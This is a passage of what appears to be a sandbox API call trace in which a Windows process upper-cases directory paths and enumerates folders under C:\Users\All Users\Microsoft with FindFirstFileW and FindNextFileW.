returned 0x21 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL 
USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.610] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0108.610] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0108.610] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: 
lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL 
USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0108.611] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0108.611] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0108.611] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0108.611] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0108.611] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.611] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", 
cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | 
out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\eHome\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0108.662] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0108.662] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 
[0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All 
Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0108.663] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0108.663] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0108.663] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0108.663] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0108.663] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.663] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a 
[0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: 
lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Event Viewer\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0108.705] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0108.705] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0108.705] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.705] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.705] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.705] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.706] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.706] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: 
lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.706] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.706] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.706] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.706] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.706] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.747] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0108.747] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0108.747] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0108.747] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0108.747] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.747] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.774] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.774] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.774] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.775] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 
| out: lpFindFileData=0x12f154) returned 1 [0108.775] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.775] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.775] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.775] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.827] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0108.827] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0108.827] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.827] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.879] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0108.879] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0108.879] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.879] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.880] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0108.880] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0108.880] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0108.880] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0108.880] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.880] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0109.336] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0109.337] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc 
